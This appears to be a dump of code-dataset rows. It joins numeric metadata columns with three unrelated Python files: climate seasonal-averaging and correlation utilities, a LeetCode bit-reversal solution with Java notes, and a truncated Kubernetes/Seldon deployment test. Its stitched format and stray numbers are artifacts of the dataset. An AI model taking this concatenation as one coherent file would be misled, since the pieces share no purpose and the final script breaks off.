| 9.333333 | 18 | 0.767857 | 9 | 56 | 4.777778 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196429 | 56 | 5 | 19 | 11.2 | 0.955556 | 0.089286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0a33cb634cfe076d601a3145a01487981499f068
| 22,712 |
py
|
Python
|
Scripts/calc_Utilities.py
|
zmlabe/ThicknessSensitivity
|
6defdd897a61d7d1a02f34a9f4ec92b2b17b3075
|
[
"MIT"
] | 1 |
2017-10-22T02:22:14.000Z
|
2017-10-22T02:22:14.000Z
|
Scripts/calc_Utilities.py
|
zmlabe/ThicknessSensitivity
|
6defdd897a61d7d1a02f34a9f4ec92b2b17b3075
|
[
"MIT"
] | null | null | null |
Scripts/calc_Utilities.py
|
zmlabe/ThicknessSensitivity
|
6defdd897a61d7d1a02f34a9f4ec92b2b17b3075
|
[
"MIT"
] | 4 |
2018-04-05T17:55:36.000Z
|
2022-03-31T07:05:01.000Z
|
"""
Functions are useful utilities for SITperturb experiments
Notes
-----
Author : Zachary Labe
Date : 13 August 2017
Usage
-----
[1] calcDecJan(varx,vary,lat,lon,level,levsq)
[2] calcDecJanFeb(varx,vary,lat,lon,level,levsq)
[3] calc_indttest(varx,vary)
[4] calc_weightedAve(var,lats)
[5] calc_spatialCorr(varx,vary,lats,lons,weight)
[6] calc_RMSE(varx,vary,lats,lons,weight)
[7] calc_spatialCorrHeight(varx,vary,lats,lons,weight)
[8] calc_spatialCorrHeightLev(varx,vary,lats,lons,weight,levelq)
"""
def calcDecJan(varx,vary,lat,lon,level,levsq):
"""
Function calculates average for December-January
Parameters
----------
varx : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
vary : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
lat : 1d numpy array
latitudes
lon : 1d numpy array
longitudes
level : string
Height of variable (surface or profile)
levsq : integer
number of levels
Returns
-------
varx_dj : 3d array or 4d array
[year,lat,lon] or [year,lev,lat,lon]
vary_dj : 3d array
[year,lat,lon] or [year,lev,lat,lon]
Usage
-----
varx_dj,vary_dj = calcDecJan(varx,vary,lat,lon,level,levsq)
"""
print('\n>>> Using calcDecJan function!')
### Import modules
import numpy as np
### Reshape for 3d variables
if level == 'surface':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varx_dj = np.empty((varx.shape[0]-1,lat.shape[0],lon.shape[0]))
vary_dj = np.empty((vary.shape[0]-1,lat.shape[0],lon.shape[0]) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djappendh = np.append(varxravel[11+i,:,:],varxravel[12+i,:,:])
djappendf = np.append(varyravel[11+i,:,:],varyravel[12+i,:,:])
varx_dj[counter,:,:] = np.nanmean(np.reshape(djappendh,
(2,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
vary_dj[counter,:,:] = np.nanmean(np.reshape(djappendf,
(2,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
### Reshape for 4d variables
elif level == 'profile':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varx_dj = np.empty((int(varx.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])))
vary_dj = np.empty((int(vary.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djappendh = np.append(varxravel[11+i,:,:,:],
varxravel[12+i,:,:,:])
djappendf = np.append(varyravel[11+i,:,:,:],
varyravel[12+i,:,:,:])
varx_dj[counter,:,:] = np.nanmean(np.reshape(djappendh,
(2,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
vary_dj[counter,:,:] = np.nanmean(np.reshape(djappendf,
(2,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
else:
        raise ValueError('Selected wrong height - (surface or profile)!')
print('Completed: Organized data by months (ON,DJ,FM)!')
print('*Completed: Finished calcDecJan function!')
return varx_dj,vary_dj
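### Example (illustrative only; shapes follow the docstring above):
# import numpy as np
# varx = np.random.rand(5,12,3,4) # [year,month,lat,lon]
# vary = np.random.rand(5,12,3,4)
# lat = np.linspace(-90,90,3); lon = np.linspace(0,360,4)
# varx_dj,vary_dj = calcDecJan(varx,vary,lat,lon,'surface',17)
# varx_dj.shape -> (4,3,4); one fewer year since December pairs with January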
###############################################################################
###############################################################################
###############################################################################
def calcDecJanFeb(varx,vary,lat,lon,level,levsq):
"""
Function calculates average for December-January-February
Parameters
----------
varx : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
vary : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
lat : 1d numpy array
latitudes
lon : 1d numpy array
longitudes
level : string
Height of variable (surface or profile)
levsq : integer
number of levels
Returns
-------
varx_djf : 3d array or 4d array
[year,lat,lon] or [year,lev,lat,lon]
vary_djf : 3d array
[year,lat,lon] or [year,lev,lat,lon]
Usage
-----
varx_djf,vary_djf = calcDecJanFeb(varx,vary,lat,lon,level,levsq)
"""
    print('\n>>> Using calcDecJanFeb function!')
### Import modules
import numpy as np
### Reshape for 3d variables
if level == 'surface':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varx_djf = np.empty((varx.shape[0]-1,lat.shape[0],lon.shape[0]))
vary_djf = np.empty((vary.shape[0]-1,lat.shape[0],lon.shape[0]) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djfappendh1 = np.append(varxravel[11+i,:,:],varxravel[12+i,:,:])
djfappendf1 = np.append(varyravel[11+i,:,:],varyravel[12+i,:,:])
djfappendh = np.append(djfappendh1,varxravel[13+i,:,:])
djfappendf = np.append(djfappendf1,varyravel[13+i,:,:])
varx_djf[counter,:,:] = np.nanmean(np.reshape(djfappendh,
(3,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
vary_djf[counter,:,:] = np.nanmean(np.reshape(djfappendf,
(3,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
### Reshape for 4d variables
elif level == 'profile':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varx_djf = np.empty((int(varx.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])))
vary_djf = np.empty((int(vary.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djfappendh1 = np.append(varxravel[11+i,:,:,:],
varxravel[12+i,:,:,:])
djfappendf1 = np.append(varyravel[11+i,:,:,:],
varyravel[12+i,:,:,:])
djfappendh = np.append(djfappendh1,
varxravel[13+i,:,:,:])
djfappendf = np.append(djfappendf1,
varyravel[13+i,:,:,:])
varx_djf[counter,:,:] = np.nanmean(np.reshape(djfappendh,
(3,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
vary_djf[counter,:,:] = np.nanmean(np.reshape(djfappendf,
(3,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
else:
        raise ValueError('Selected wrong height - (surface or profile)!')
print('Completed: Organized data by months (DJF)!')
print('*Completed: Finished calcDecJanFeb function!')
return varx_djf,vary_djf
###############################################################################
###############################################################################
###############################################################################
def calc_indttest(varx,vary):
"""
Function calculates statistical difference for 2 independent
sample t-test
Parameters
----------
varx : 3d array
vary : 3d array
Returns
-------
stat = calculated t-statistic
pvalue = two-tailed p-value
Usage
-----
    stat,pvalue = calc_indttest(varx,vary)
"""
    print('\n>>> Using calc_indttest function!')
### Import modules
import numpy as np
import scipy.stats as sts
### 2-independent sample t-test
stat,pvalue = sts.ttest_ind(varx,vary,nan_policy='omit')
### Significant at 95% confidence level
pvalue[np.where(pvalue >= 0.05)] = np.nan
pvalue[np.where(pvalue < 0.05)] = 1.
    print('*Completed: Finished calc_indttest function!')
return stat,pvalue
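### Example (illustrative only): pvalue is masked to np.nan where differences
### are not significant and set to 1. where significant at 95% confidence.
# import numpy as np
# a = np.random.randn(30,4,5); b = np.random.randn(30,4,5) + 1.
# stat,pvalue = calc_indttest(a,b) # pvalue -> mostly 1. (significant shift)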
###############################################################################
###############################################################################
###############################################################################
def calc_weightedAve(var,lats):
"""
    Area-weights the sit array from 5d [ens,year,month,lat,lon] down to [ens,year,month]
Parameters
----------
var : 5d,4d,3d array of a gridded variable
lats : 2d array of latitudes
Returns
-------
meanvar : weighted average for 3d,2d,1d array
Usage
-----
meanvar = calc_weightedAve(var,lats)
"""
print('\n>>> Using calc_weightedAve function!')
### Import modules
import numpy as np
### Calculate weighted average for various dimensional arrays
if var.ndim == 5:
meanvar = np.empty((var.shape[0],var.shape[1],var.shape[2]))
for ens in range(var.shape[0]):
for i in range(var.shape[1]):
for j in range(var.shape[2]):
varq = var[ens,i,j,:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar[ens,i,j] = np.nansum(varmask*areamask) \
/np.sum(areamask)
elif var.ndim == 4:
meanvar = np.empty((var.shape[0],var.shape[1]))
for i in range(var.shape[0]):
for j in range(var.shape[1]):
varq = var[i,j,:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar[i,j] = np.nansum(varmask*areamask)/np.sum(areamask)
elif var.ndim == 3:
meanvar = np.empty((var.shape[0]))
for i in range(var.shape[0]):
varq = var[i,:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar[i] = np.nansum(varmask*areamask)/np.sum(areamask)
elif var.ndim == 2:
meanvar = np.empty((var.shape[0]))
varq = var[:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar = np.nansum(varmask*areamask)/np.sum(areamask)
else:
        raise ValueError('Variable has the wrong dimensions!')
print('Completed: Weighted variable average!')
print('*Completed: Finished calc_weightedAve function!')
return meanvar
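### Example (illustrative only): area-weighted mean of a 3d [time,lat,lon]
### field, using a 2d latitude grid to build the cos(latitude) weights.
# import numpy as np
# lat2,lon2 = np.meshgrid(np.linspace(-90,90,5),np.linspace(0,360,8),
#                         indexing='ij')
# var = np.ones((10,5,8)) # uniform field -> weighted mean is exactly 1.
# calc_weightedAve(var,lat2) # returns an array of ten 1.0 values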
###############################################################################
###############################################################################
###############################################################################
def calc_spatialCorr(varx,vary,lats,lons,weight):
"""
Calculates spatial correlation from pearson correlation coefficient
Parameters
----------
varx : 2d array
vary : 2d array
lats : 1d array
    lons : 1d array of longitudes
weight : string (yes or no)
Returns
-------
corrcoef : 1d array of correlation coefficient (pearson r)
Usage
-----
corrcoef = calc_spatialCorr(varx,vary,lats,lons)
"""
print('\n>>> Using calc_spatialCorr function!')
### Import modules
import numpy as np
if weight == 'yes': # Computed weighted correlation coefficient
### mask
mask = 'yes'
if mask == 'yes':
latq = np.where(lats > 40)[0]
lats = lats[latq]
varx = varx[latq,:]
vary = vary[latq,:]
print('MASKING LATITUDES!')
### Create 2d meshgrid for weights
lon2,lat2 = np.meshgrid(lons,lats)
### Create 2d array of weights based on latitude
gw = np.cos(np.deg2rad(lat2))
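        ### The nested helpers below implement the weighted Pearson r:
        ### r_w = cov_w(x,y) / sqrt(cov_w(x,x) * cov_w(y,y)),
        ### with every moment weighted by gw = cos(latitude).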
def m(x, w):
"""Weighted Mean"""
wave = np.sum(x * w) / np.sum(w)
print('Completed: Computed weighted average!')
return wave
def cov(x, y, w):
"""Weighted Covariance"""
wcov = np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
print('Completed: Computed weighted covariance!')
return wcov
def corr(x, y, w):
"""Weighted Correlation"""
wcor = cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
print('Completed: Computed weighted correlation!')
return wcor
corrcoef = corr(varx,vary,gw)
elif weight == 'no':
### Correlation coefficient from numpy function (not weighted)
        corrcoef = np.corrcoef(varx.ravel(),vary.ravel())[0][1]
print('Completed: Computed NON-weighted correlation!')
else:
        raise ValueError('Wrong weighted argument in function!')
print('*Completed: Finished calc_SpatialCorr function!')
return corrcoef
###############################################################################
###############################################################################
###############################################################################
def calc_RMSE(varx,vary,lats,lons,weight):
"""
    Calculates the latitude-weighted root mean square error (RMSE)
Parameters
----------
    varx : 2d array
    vary : 2d array
    lats : 1d array of latitudes
    lons : 1d array of longitudes
    weight : string (yes or no)
Returns
-------
rmse : 1d array
Usage
-----
rmse = calc_RMSE(varx,vary,lats,lons)
"""
print('\n>>> Using calc_RMSE function!')
### Import modules
import numpy as np
from sklearn.metrics import mean_squared_error
if weight == 'yes': # Computed weighted correlation coefficient
### mask
mask = 'yes'
if mask == 'yes':
latq = np.where(lats > 40)[0]
lats = lats[latq]
varx = varx[latq,:]
vary = vary[latq,:]
print('MASKING LATITUDES!')
### Create 2d meshgrid for weights
lon2,lat2 = np.meshgrid(lons,lats)
### Create 2d array of weights based on latitude
gw = np.cos(np.deg2rad(lat2))
### Calculate rmse
sq_err = (varx - vary)**2
rmse = np.sqrt((np.sum(sq_err*gw))/np.sum(gw))
elif weight == 'no':
### Root mean square error from sklearn (not weighted)
rmse = np.sqrt(mean_squared_error(varx.ravel(),vary.ravel()))
print('Completed: Computed NON-weighted correlation!')
else:
        raise ValueError('Wrong weighted argument in function!')
print('*Completed: Finished calc_RMSE function!')
return rmse
###############################################################################
###############################################################################
###############################################################################
def calc_spatialCorrHeight(varx,vary,levs,lons,weight):
"""
Calculates spatial correlation from pearson correlation coefficient for
grids over vertical height (17 pressure coordinate levels)
Parameters
----------
varx : 2d array
vary : 2d array
levs : 1d array of levels
    lons : 1d array of longitudes
weight : string (yes or no)
Returns
-------
corrcoef : 1d array of correlation coefficient (pearson r)
Usage
-----
corrcoef = calc_spatialCorrHeight(varx,vary,lats,lons)
"""
print('\n>>> Using calc_spatialCorrHeight function!')
### Import modules
import numpy as np
if weight == 'yes': # Computed weighted correlation coefficient
### Create 2d meshgrid for weights
lon2,lev2 = np.meshgrid(lons,levs)
### Create 2d array of weights based on latitude
gwq = np.array([0.25,0.25,0.25,0.25,0.25,0.25,0.4,0.5,0.5,0.5,
0.5,0.5,0.5,0.7,0.7,0.7,1.])
gw,gw2 = np.meshgrid(lons,gwq)
def m(x, w):
"""Weighted Mean"""
wave = np.sum(x * w) / np.sum(w)
print('Completed: Computed weighted average (17 P Levels)!')
return wave
def cov(x, y, w):
"""Weighted Covariance"""
wcov = np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
print('Completed: Computed weighted covariance (17 P Levels)!')
return wcov
def corr(x, y, w):
"""Weighted Correlation"""
wcor = cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
print('Completed: Computed weighted correlation (17 P Levels)!')
return wcor
corrcoef = corr(varx,vary,gw)
elif weight == 'no':
### Correlation coefficient from numpy function (not weighted)
        corrcoef = np.corrcoef(varx.ravel(),vary.ravel())[0][1]
print('Completed: Computed NON-weighted correlation!')
else:
        raise ValueError('Wrong weighted argument in function!')
print('*Completed: Finished calc_SpatialCorrHeight function!')
return corrcoef
###############################################################################
###############################################################################
###############################################################################
def calc_spatialCorrHeightLev(varx,vary,levs,lons,weight,levelq):
"""
Calculates spatial correlation from pearson correlation coefficient for
grids over vertical height (17 pressure coordinate levels). Change the
weighting for different level correlations
Parameters
----------
varx : 2d array
vary : 2d array
levs : 1d array of levels
    lons : 1d array of longitudes
weight : string (yes or no)
levelq : string (all, tropo, strato)
Returns
-------
corrcoef : 1d array of correlation coefficient (pearson r)
Usage
-----
corrcoef = calc_spatialCorrHeight(varx,vary,lats,lons,levels)
"""
print('\n>>> Using calc_spatialCorrHeightLev function!')
### Import modules
import numpy as np
if weight == 'yes': # Computed weighted correlation coefficient
### Create 2d meshgrid for weights
lon2,lev2 = np.meshgrid(lons,levs)
if levelq == 'all':
### Create 2d array of weights based on latitude
gwq = np.array([0.25,0.25,0.25,0.25,0.25,0.25,0.4,0.5,0.5,0.5,
0.5,0.5,0.5,0.7,0.7,0.7,1.])
gw,gw2 = np.meshgrid(lons,gwq)
elif levelq == 'tropo':
gwq = np.array([1.0,1.0,1.0,1.0,0.5,0.5,0.5,0.2,0.2,0.,0.,0.,
0.,0.,0.,0.,0.])
gw,gw2 = np.meshgrid(lons,gwq)
elif levelq == 'strato':
gwq = np.array([0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.5,1.,1.,1.,1.
,1.,1.])
gw,gw2 = np.meshgrid(lons,gwq)
def m(x, w):
"""Weighted Mean"""
wave = np.sum(x * w) / np.sum(w)
print('Completed: Computed weighted average (17 P Levels)!')
return wave
def cov(x, y, w):
"""Weighted Covariance"""
wcov = np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
print('Completed: Computed weighted covariance (17 P Levels)!')
return wcov
def corr(x, y, w):
"""Weighted Correlation"""
wcor = cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
print('Completed: Computed weighted correlation (17 P Levels)!')
return wcor
corrcoef = corr(varx,vary,gw)
elif weight == 'no':
### Correlation coefficient from numpy function (not weighted)
        corrcoef = np.corrcoef(varx.ravel(),vary.ravel())[0][1]
print('Completed: Computed NON-weighted correlation!')
else:
        raise ValueError('Wrong weighted argument in function!')
print('*Completed: Finished calc_SpatialCorrHeightLev function!')
return corrcoef
| 36.514469 | 95 | 0.468739 | 2,463 | 22,712 | 4.295575 | 0.097848 | 0.042533 | 0.020416 | 0.022684 | 0.831947 | 0.81465 | 0.795747 | 0.750189 | 0.738185 | 0.719187 | 0 | 0.030765 | 0.330222 | 22,712 | 622 | 96 | 36.514469 | 0.664738 | 0.224287 | 0 | 0.686411 | 0 | 0 | 0.11901 | 0.006239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059233 | false | 0 | 0.034843 | 0 | 0.15331 | 0.12892 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0a3472688b742e51fb849821bffb5408a0c299f0
| 5,306 |
py
|
Python
|
cs15211/ReverseBits.py
|
JulyKikuAkita/PythonPrac
|
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
|
[
"Apache-2.0"
] | 1 |
2021-07-05T01:53:30.000Z
|
2021-07-05T01:53:30.000Z
|
cs15211/ReverseBits.py
|
JulyKikuAkita/PythonPrac
|
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
|
[
"Apache-2.0"
] | null | null | null |
cs15211/ReverseBits.py
|
JulyKikuAkita/PythonPrac
|
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
|
[
"Apache-2.0"
] | 1 |
2018-01-08T07:14:08.000Z
|
2018-01-08T07:14:08.000Z
|
__source__ = 'https://leetcode.com/problems/reverse-bits/description/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/reverse-bits.py
# Time : O(n)
# Space: O(1)
# Bit Manipulation
#
# Description: Leetcode # 190. Reverse Bits
#
# Reverse bits of a given 32 bits unsigned integer.
#
# For example, given input 43261596 (represented in binary as 00000010100101000001111010011100),
# return 964176192 (represented in binary as 00111001011110000010100101000000).
#
# Follow up:
# If this function is called many times, how would you optimize it?
#
# Companies
# Apple Airbnb
# Related Topics
# Bit Manipulation
# Similar Questions
# Number of 1 Bits
#
import unittest
class Solution:
# @param n, an integer
# @return an integer
def reverseBits(self, n):
result = 0
        for i in range(32):
result <<= 1
result |= n & 1
n >>= 1
return result
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
        print(Solution().reverseBits(1))
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
# 1ms 100%
class Solution {
// you need treat n as an unsigned value
public int reverseBits(int n) {
int ret = 0;
for (int i = 0; i < 32; i++) {
if ((n & 1) != 0) {
ret |= 1; //same as // res += n & 1
}
n >>>= 1; // padding 0 on the left side
if (i < 31) { // CATCH: for last digit, don't shift!
ret <<= 1;
}
}
return ret;
}
}
We first initialize result to 0. We then iterate from 0 to 31 (an integer has 32 bits).
In each iteration: We first shift result to the left by 1 bit.
Then, if the last digit of input n is 1, we add 1 to result.
To find the last digit of n, we just do: (n & 1)
For example, if n = 5 (101), n&1 = 101 & 001 = 001 = 1; however, if n = 2 (10), n&1 = 10 & 01 = 0.
Finally, we update n by shifting it to the right by 1 (n >>= 1)
At the end of the iteration, we return result.
Example, if input n = 13 (represented in binary as
0000_0000_0000_0000_0000_0000_0000_1101, the "_" is for readability),
calling reverseBits(13) should return:
1011_0000_0000_0000_0000_0000_0000_0000
Here is how our algorithm would work for input n = 13:
Initially, result = 0 = 0000_0000_0000_0000_0000_0000_0000_0000,
n = 13 = 0000_0000_0000_0000_0000_0000_0000_1101
Starting for loop:
i = 0:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_0000.
n&1 = 0000_0000_0000_0000_0000_0000_0000_1101 &
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
therefore result = result + 1 =
0000_0000_0000_0000_0000_0000_0000_0000 +
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
We right shift n by 1 (n >>= 1) to get:
n = 0000_0000_0000_0000_0000_0000_0000_0110.
We then go to the next iteration.
i = 1:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_0010;
n&1 = 0000_0000_0000_0000_0000_0000_0000_0110 &
0000_0000_0000_0000_0000_0000_0000_0001
= 0000_0000_0000_0000_0000_0000_0000_0000 = 0;
therefore we don't increment result.
We right shift n by 1 (n >>= 1) to get:
n = 0000_0000_0000_0000_0000_0000_0000_0011.
We then go to the next iteration.
i = 2:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_0100.
n&1 = 0000_0000_0000_0000_0000_0000_0000_0011 &
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
therefore result = result + 1 =
0000_0000_0000_0000_0000_0000_0000_0100 +
0000_0000_0000_0000_0000_0000_0000_0001 =
result = 0000_0000_0000_0000_0000_0000_0000_0101
We right shift n by 1 to get:
n = 0000_0000_0000_0000_0000_0000_0000_0001.
We then go to the next iteration.
i = 3:
result = result << 1 = 0000_0000_0000_0000_0000_0000_0000_1010.
n&1 = 0000_0000_0000_0000_0000_0000_0000_0001 &
0000_0000_0000_0000_0000_0000_0000_0001 =
0000_0000_0000_0000_0000_0000_0000_0001 = 1
therefore result = result + 1 =
= 0000_0000_0000_0000_0000_0000_0000_1011
We right shift n by 1 to get:
n = 0000_0000_0000_0000_0000_0000_0000_0000 = 0.
Now, from here to the end of the iteration, n is 0,
so (n&1) will always be 0 and n >>=1 will not change n.
The only change will be for result <<=1, i.e. shifting result to the left by 1 digit.
Since there we have i=4 to i = 31 iterations left, this will result
in padding 28 0's to the right of result. i.e at the end,
we get result = 1011_0000_0000_0000_0000_0000_0000_0000
This is exactly what we expected to get
# 1ms 100%
class Solution {
// you need treat n as an unsigned value
public int reverseBits(int n) {
if (n == 0) return 0;
int result = 0;
for (int i = 0; i < 32; i++) {
result <<= 1;
if ((n & 1) == 1) result++;
n >>= 1;
}
return result;
}
}
# 1ms 100%
class Solution {
// you need treat n as an unsigned value
public int reverseBits(int n) {
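        // Divide-and-conquer bit reversal: swap adjacent bits, then 2-bit
        // pairs, then nibbles, then bytes, then the two 16-bit halves. Each
        // mask keeps one half of every group (0x5... = 0101..., 0x3... =
        // 0011..., etc.) so the paired shifts exchange the halves in place.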
n = ((n & 0x55555555) << 1) | ((n & 0xAAAAAAAA) >>> 1);
n = ((n & 0x33333333) << 2) | ((n & 0xCCCCCCCC) >>> 2);
n = ((n & 0x0F0F0F0F) << 4) | ((n & 0xF0F0F0F0) >>> 4);
n = ((n & 0x00FF00FF) << 8) | ((n & 0xFF00FF00) >>> 8);
return (n >>> 16) | (n << 16);
}
}
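A common answer to the follow-up question (a sketch only, not from the
original post): process the integer byte by byte and memoize each byte's
8-bit reversal in a 256-entry lookup table, so repeated calls reuse the
table instead of re-reversing every bit.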
'''
| 31.963855 | 96 | 0.67942 | 885 | 5,306 | 3.80452 | 0.216949 | 0.470448 | 0.595189 | 0.646273 | 0.485595 | 0.473715 | 0.463023 | 0.454707 | 0.36828 | 0.328185 | 0 | 0.314932 | 0.225028 | 5,306 | 165 | 97 | 32.157576 | 0.503891 | 0.109876 | 0 | 0.264 | 0 | 0.024 | 0.905472 | 0.267618 | 0 | 0 | 0.017032 | 0 | 0.008 | 0 | null | null | 0 | 0.008 | null | null | 0.008 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0a444a2a9b00c93ede978edd61b59c20a6608e93
| 5,351 |
py
|
Python
|
testing/scripts/test_ksonnet_single_namespace.py
|
dtrawins/seldon-core
|
3d8b3791b343118953757a1e787e5919cc64e697
|
[
"Apache-2.0"
] | null | null | null |
testing/scripts/test_ksonnet_single_namespace.py
|
dtrawins/seldon-core
|
3d8b3791b343118953757a1e787e5919cc64e697
|
[
"Apache-2.0"
] | null | null | null |
testing/scripts/test_ksonnet_single_namespace.py
|
dtrawins/seldon-core
|
3d8b3791b343118953757a1e787e5919cc64e697
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import time
import subprocess
from subprocess import run,Popen
from seldon_utils import *
from k8s_utils import *
def wait_for_shutdown(deploymentName):
ret = run("kubectl get deploy/"+deploymentName, shell=True)
while ret.returncode == 0:
time.sleep(1)
ret = run("kubectl get deploy/"+deploymentName, shell=True)
def wait_for_rollout(deploymentName):
ret = run("kubectl rollout status deploy/"+deploymentName, shell=True)
while ret.returncode > 0:
time.sleep(1)
ret = run("kubectl rollout status deploy/"+deploymentName, shell=True)
def initial_rest_request():
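    # The API gateway may not be ready immediately after rollout, so retry
    # the first request with short back-offs (1s, then 5s) before returning.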
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
if not r.status_code == 200:
time.sleep(1)
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
if not r.status_code == 200:
time.sleep(5)
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
return r
@pytest.mark.usefixtures("seldon_java_images")
@pytest.mark.usefixtures("single_namespace_seldon_ksonnet")
class TestSingleNamespace(object):
    # Test single model ksonnet script with 4 API methods
def test_single_model(self):
run('cd my-model && ks delete default && ks component rm mymodel', shell=True)
run('kubectl delete sdep --all', shell=True)
run('cd my-model && ks generate seldon-serve-simple-v1alpha2 mymodel --image seldonio/mock_classifier:1.0 --oauthKey=oauth-key --oauthSecret=oauth-secret && ks apply default -c mymodel', shell=True, check=True)
wait_for_rollout("mymodel-mymodel-025d03d")
r = initial_rest_request()
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = rest_request_ambassador("mymodel",None,API_AMBASSADOR)
res = r.json()
print(res)
assert r.status_code == 200
assert len(r.json()["data"]["tensor"]["values"]) == 1
r = grpc_request_ambassador2("mymodel",None,API_AMBASSADOR)
print(r)
r = grpc_request_api_gateway2("oauth-key","oauth-secret",None,rest_endpoint=API_GATEWAY_REST,grpc_endpoint=API_GATEWAY_GRPC)
print(r)
run('cd my-model && ks delete default -c mymodel && ks component rm mymodel', shell=True)
    # Test AB test model ksonnet script with 4 API methods
def test_abtest_model(self):
run('cd my-model && ks delete default && ks component rm mymodel', shell=True)
run('kubectl delete sdep --all', shell=True)
run('cd my-model && ks generate seldon-abtest-v1alpha2 myabtest --imageA seldonio/mock_classifier:1.0 --imageB seldonio/mock_classifier:1.0 --oauthKey=oauth-key --oauthSecret=oauth-secret && ks apply default -c myabtest', shell=True)
wait_for_rollout("myabtest-myabtest-41de5b8")
wait_for_rollout("myabtest-myabtest-df66c5c")
r = initial_rest_request()
r = rest_request_api_gateway("oauth-key","oauth-secret",None,API_GATEWAY_REST)
res = r.json()
print(res)
